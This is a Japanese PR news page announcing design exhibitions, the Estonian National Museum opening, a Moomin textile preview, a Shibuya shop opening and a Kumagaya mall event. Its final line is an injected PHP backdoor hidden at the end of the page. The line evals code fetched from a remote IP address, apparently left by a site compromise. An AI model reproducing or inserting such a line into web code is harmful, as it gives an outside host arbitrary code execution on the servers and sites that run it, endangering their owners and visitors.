デイリープレス

TAKAIYAMA inc. EXHIBITION
3F/B.C.G

news / 2017.08.04

tags: event, exhibition, information

まず空間をとらえる、そうすると枠組みが立ち上がる。
名刺から東京ドームまで(宇宙の可能性もある)、おはようからおやすみまで、
コンニャロウ世の中からまんまんちゃんあん(言いますか?)まで。
うらみはらさでおくべきか、と言ってはみたものの、もはや恨みもなくなった。のかな?
そんなことはない。世の中にはまだまだやるべきことがいっぱい。
ならばデザインにも使命があるはずだ。

今までプロジェクトごとに解き方を考えてやってきたのだけど、
見返してみれば自分達なりのアプローチの法則がぼんやり見えてきた。
Focus/Frame/Function(フォーカス・フレイム・ファンクション)焦点・枠組・機能。
困った時には唱えてみよう、魔法の言葉。(現実だけど、、)
まず空間をとらえる、そうすると枠組みが立ち上がる。

TAKAIYAMA inc.の15年の仕事をご覧いただける機会です。
ぜひお出かけ下さい。

山野英之

read more

DGT. が手がけるエストニア・ナショナル・ミュージアム
「MEMORY FIELD」2016年10月1日オープン

パリを拠点に活動する建築家ユニットDGT.の田根剛、ダン・ドレル、リナ・ゴットメが手がけるエストニア・ナショナル・ミュージアムが、10年の歳月をかけていよいよ10月1日にオープンします。
  
ナショナル・ミュージアムが建設されるのは、首都タリンの次に人口が多く、文化・学術の街として知られるタルトゥ。市街から車で5分も行くと現れる広大な森の中です。
そしてここはエストニアが旧ソ連占領下の時代に軍用地だった場所。
1991年の独立後も取り残されていた軍用地に横たわる滑走路の延長線上に、ミュージアムは直結されました。
負の遺産に横たわる、膨大なコンクリートで作られたかつての滑走路のその先に、空へと立ち上っていくように延びる力強い一本の線。一本の線が空と大地を分けるその場所で過去は未来に繋がります。歴史を伝えこれからを見つめる場所として、エストニアの人々が待ちに待ったナショナル・ミュージアムの完成です。

news / 2016.08.10

tags: DGT., information, new open

『エストニア国立博物館 / ESTONIAN NATIONAL MUSEUM』 read more

テキスタイルデザイナー 鈴木マサルが描くムーミンの世界
「MOOMIN TRIBUTE WORKS」新作展示会のおしらせ

国や世代を超えて愛され続ける、フィンランドで生まれた北欧を代表するキャラクター「ムーミントロール」とその仲間たち。その原作の世界観を踏襲し、イメージを膨らませて新たなオリジナルストーリーが描かれる「 MOOMIN TRIBUTE WORKS 」は、日本のテキスタイルメーカー クォーターリポート社とテキスタイルデザイナー鈴木マサルさんのコラボレーションによるテキスタイルブランドです。

news / 2014.01.29

tags: exhibition, information, Masaru Suzuki

2014年は、原作者である、トーベ・ヤンソンさんの生誕100周年ということもあり、本国フィンランドをはじめ、日本でも美術展や様々なイベントが予定されています。

新作のテキスタイルを下記の日程にてお披露目致します。ぜひご注目くださいますようお願い致します。

MOOMIN TRIBUTE WORKS 新作展示会
会場:TABLOID (東京都港区海岸2-6-24
     EXTRA PREVIEW #8 AREA 6 (2階)
会期:2014.2.5(水)〜2.7(金)
    2/5, 6 10:00〜20:00 (受付は19:30まで)
    2/7 10:00〜19:00(受付は、18:00まで)

2月6日は、鈴木マサルさんが来場致します。
新作や制作背景についてなど、ぜひ会場にて直接お話しいただけましたら幸いです。

※ EXTRA PREVIEW #8への入場は、バイヤー、業者、プレスなどの方のみになります。
 ご了承くださいますようお願い申し上げます。

本件の詳細は、下記、プレスリリースをご参照ください。
MOOMIN TRIBUTE WORKS NEW COLLECTION 2014

©Moomin Characters™

サンフランシスコの自由な空気から生まれるファッションを提案する 7×7

7×7とは、サンフランシスコの縮図(面積:49平方マイル)でローカルな人たちが使う愛称。サンフランシスコを拠点にヴィンテージのバイイングをはじめ、地元のアーティスト達と独自の交流を深めてきたディレクターの川上淳也氏が、自身が様々な影響を受けた地をテーマに、自由な空気から生まれるファッションを提案しています。店内に入ると大きな窓越しに見えるグリーン。決して広い空間ではないはずなのに、どこか開放的でおおらかな雰囲気につつまれます。ディレクターの独特の感性が、アイテムのセレクションから、什器、空間にいたるまで隅々にいき渡っているのが感じられます。

news / 2013.09.02

tags: information, new open

2013年7月27日、LAILA TOKIOの1階にオープンした、<7×7/seven by seven>。

<7×7/seven by seven>
東京都渋谷区渋谷1-5-11 1F
tel.03-6427-6325
open:11:30~20:00 (定休日なし)
http://seven-by-seven.com/
read more

NEWLAND オープン1周年記念 イベント ニュース!

7/13(土)・14(日) 
第1弾は、ビアガーデン。 全館23時までオープンします。

news / 2013.07.10

tags: event, information, NEWLAND

埼玉県・熊谷の複合商業施設「NEWLAND」では、7月から8月にかけ、1周年記念のスペシャル・イベントを開催。
新企画のビアガーデンや、NEWLANDと共感する仲間たちによる新企画NEWLAND Days、オーガニック料理界のカリスマ、アリス・ウォータースの書籍出版記念にちなんだ、写真展や1日限定レストランなど、様々な企画が予定されています。
今年も暑い夏になりそうです。ぜひ、熱い熊谷、NEWLANDへ! read more

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>